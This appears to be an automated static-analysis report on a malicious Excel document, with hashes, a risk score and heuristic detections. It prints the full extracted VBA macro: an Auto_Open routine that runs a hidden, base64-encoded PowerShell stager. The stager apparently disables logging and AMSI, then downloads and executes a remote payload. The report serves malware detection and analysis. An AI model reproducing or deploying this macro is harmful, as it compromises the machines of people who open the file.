Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d17dcbfdf1b0b5c7…

MALICIOUS

Office (OOXML)

18.4 KB Created: 2021-06-12 10:29:04 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: 15c2fc97329b3918d7331a3b3363b1c7 SHA-1: 7c8786e9f3e3a624d5c56d19c1f9656fceacb469 SHA-256: d17dcbfdf1b0b5c7dbf62074d4af78f5593cbc32c945e1b65785992945a61802
228 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            od = od + "AEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (od)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            Dim od As String
        od = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
        od = od + "BlAFIAcwBJAG8ATgBUAGEAYgBsAGUALgBQAFMAVgBFAFIAcwBJ"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            od = od + "AEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (od)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
Sub Auto_Open()
        JK

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8193 bytes
SHA-256: 04994da59d505afa1a67f6a0930547eee8fd9b9f6e91a60f7782dfa4b371f996
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
        JK
End Sub

Public Function JK() As Variant
        Dim od As String
        od = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
        od = od + "BlAFIAcwBJAG8ATgBUAGEAYgBsAGUALgBQAFMAVgBFAFIAcwBJ"
        od = od + "AE8AbgAuAE0AQQBKAE8AcgAgAC0ARwBlACAAMwApAHsAJAA2AD"
        od = od + "cARQA9AFsAcgBlAGYAXQAuAEEAUwBzAEUAbQBiAEwAWQAuAEcA"
        od = od + "ZQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
        od = od + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
        od = od + "AHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkAZQBgAEwARAAiAC"
        od = od + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
        od = od + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
        od = od + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAA2"
        od = od + "ADcARQApAHsAJAA4ADkAYgA9ACQANgA3AEUALgBHAEUAVABWAG"
        od = od + "EATABVAEUAKAAkAG4AdQBsAGwAKQA7AEkARgAoACQAOAA5AGIA"
        od = od + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
        od = od + "BnAGkAbgBnACcAXQApAHsAJAA4ADkAYgBbACcAUwBjAHIAaQBw"
        od = od + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
        od = od + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
        od = od + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4ADkAQg"
        od = od + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
        od = od + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
        od = od + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
        od = od + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAG8ATA"
        od = od + "BMAGUAYwBUAGkAbwBuAFMALgBHAGUATgBlAHIAaQBDAC4ARABJ"
        od = od + "AEMAdABJAE8AbgBBAHIAeQBbAHMAdAByAGkAbgBnACwAUwBZAH"
        od = od + "MAVABlAE0ALgBPAEIAagBlAEMAdABdAF0AOgA6AE4ARQBXACgA"
        od = od + "KQA7ACQAVgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUw"
        od = od + "BjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBu"
        od = od + "AGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQARAAoACcARQBuAG"
        od = od + "EAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8A"
        od = od + "YwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJA"
        od = od + "A4ADkAYgBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBD"
        od = od + "AEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAG"
        od = od + "MAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQA"
        od = od + "bwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQ"
        od = od + "BwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBd"
        od = od + "AD0AJABWAEEATAB9AEUAbABTAGUAewBbAFMAYwByAGkAUABUAE"
        od = od + "IAbABPAGMAawBdAC4AIgBHAEUAVABGAEkAZQBgAEwARAAiACgA"
        od = od + "JwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbw"
        od = od + "BuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBl"
        od = od + "AFQAVgBBAGwAdQBFACgAJABuAFUATABsACwAKABOAGUAdwAtAE"
        od = od + "8AQgBqAGUAQwBUACAAQwBvAGwATABlAGMAVABJAG8ATgBzAC4A"
        od = od + "RwBlAE4ARQBSAEkAQwAuAEgAQQBTAEgAUwBlAHQAWwBzAHQAcg"
        od = od + "BJAE4AZwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBGAF0ALgBB"
        od = od + "AHMAUwBFAE0AQgBsAHkALgBHAGUAVABUAHkAcABlACgAJwBTAH"
        od = od + "kAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUA"
        od = od + "dABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQ"
        od = od + "BsAHMAJwApADsAJABSAEUAZgAuAEcARQB0AEYAaQBlAGwARAAo"
        od = od + "ACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkAC"
        od = od + "cALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA"
        od = od + "JwApAC4AUwBFAHQAVgBhAEwAdQBlACgAJABuAHUAbABMACwAJA"
        od = od + "B0AHIAdQBFACkAOwB9ADsAWwBTAFkAUwB0AGUATQAuAE4ARQBU"
        od = od + "AC4AUwBFAFIAdgBJAGMAZQBQAE8AaQBuAFQATQBhAG4AQQBHAE"
        od = od + "UAUgBdADoAOgBFAFgAUABlAGMAdAAxADAAMABDAE8AbgBUAEkA"
        od = od + "bgB1AGUAPQAwADsAJABlAGMAQgA9AE4AZQB3AC0ATwBCAGoAZQ"
        od = od + "BjAFQAIABTAHkAcwBUAEUAbQAuAE4ARQB0AC4AVwBFAGIAQwBs"
        od = od + "AEkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC"
        od = od + "4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsA"
        od = od + "IABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMA"
        od = od + "A7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBj"
        od = od + "AGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAG"
        od = od + "4AQwBPAEQAaQBOAGcAXQA6ADoAVQBuAEkAQwBPAEQARQAuAEcA"
        od = od + "RQBUAFMAdABSAEkATgBnACgAWwBDAG8ATgBWAEUAcgB0AF0AOg"
        od = od + "A6AEYAcgBvAE0AQgBhAHMARQA2ADQAUwBUAFIAaQBOAEcAKAAn"
        od = od + "AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AE"
        od = od + "EAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEA"
        od = od + "QwA0AEEATQBRAEEAdwBBAEMANABBAE4AQQBBADQAQQBEAG8AQQ"
        od = od + "BPAEEAQQA0AEEARABnAEEATwBBAEEAPQAnACkAKQApADsAJAB0"
        od = od + "AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAG"
        od = od + "gAcAAnADsAJABlAEMAYgAuAEgAZQBBAGQAZQByAFMALgBBAGQA"
        od = od + "RAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOw"
        od = od + "AkAGUAQwBCAC4AUAByAG8AeAB5AD0AWwBTAFkAUwB0AGUATQAu"
        od = od + "AE4AZQB0AC4AVwBlAEIAUgBlAHEAVQBlAFMAdABdADoAOgBEAE"
        od = od + "UARgBhAHUAbAB0AFcARQBiAFAAcgBvAHgAWQA7ACQAZQBjAGIA"
        od = od + "LgBQAHIATwBYAFkALgBDAFIARQBkAEUATgB0AEkAYQBsAHMAIA"
        od = od + "A9ACAAWwBTAHkAUwB0AGUATQAuAE4AZQB0AC4AQwBSAEUARABl"
        od = od + "AE4AdABJAGEAbABDAEEAQwBoAEUAXQA6ADoARABlAGYAYQB1AG"
        od = od + "wAVABOAEUAVABXAE8AcgBrAEMAUgBlAGQAZQBOAFQAaQBhAEwA"
        od = od + "cwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJA"
        od = od + "BlAGMAYgAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABF"
        od = od + "AE0ALgBUAGUAWABUAC4ARQBuAEMAbwBkAGkAbgBHAF0AOgA6AE"
        od = od + "EAUwBDAEkASQAuAEcARQBUAEIAWQBUAEUAUwAoACcAZABDAFMA"
        od = od + "RABoACkAZQBHADMAdAB5AD8AcgB6AHgATwBZAGsAdwBCACwAYg"
        od = od + "BQAEEAMgB7AFgAagBMAGcALQBpACcAKQA7ACQAUgA9AHsAJABE"
        od = od + "ACwAJABLAD0AJABBAHIARwBzADsAJABTAD0AMAAuAC4AMgA1AD"
        od = od + "UAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQA"
        od = od + "UwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUATg"
        od = od + "BUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAk"
        od = od + "AEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7AC"
        od = od + "QARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsA"
        od = od + "JABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOw"
        od = od + "AkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABI"
        od = od + "AF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAF"
        od = od + "sAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUA"
        od = od + "NgBdAH0AfQA7ACQARQBDAEIALgBIAGUAYQBEAEUAcgBzAC4AQQ"
        od = od + "BEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFUASwBCAGcASwBy"
        od = od + "AG4AWQBOAE4APQBLAFAASgB0ADcAOQB6AG8AagB5AHIALwBpAD"
        od = od + "kAagBiAHMAMwBWAGYAZQA2ADUAZAA3AGIAbwA9ACIAKQA7ACQA"
        od = od + "RABhAHQAQQA9ACQAZQBjAEIALgBEAE8AdwBOAGwAbwBBAGQARA"
        od = od + "BBAFQAQQAoACQAUwBlAHIAKwAkAFQAKQA7ACQASQB2AD0AJABk"
        od = od + "AGEAVABhAFsAMAAuAC4AMwBdADsAJABkAEEAdABBAD0AJABEAG"
        od = od + "EAVABBAFsANAAuAC4AJABkAGEAVABhAC4ATABlAE4AZwBUAEgA"
        od = od + "XQA7AC0AagBPAGkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJA"
        od = od + "BSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJ"
        od = od + "AEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (od)
End Function


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 25088 bytes
SHA-256: bf63cac8fc7ebe3c946468a7cdb80b15e036f671244f37a803d18f103012d323

Open this report in the interactive analyzer, or submit your own file for analysis.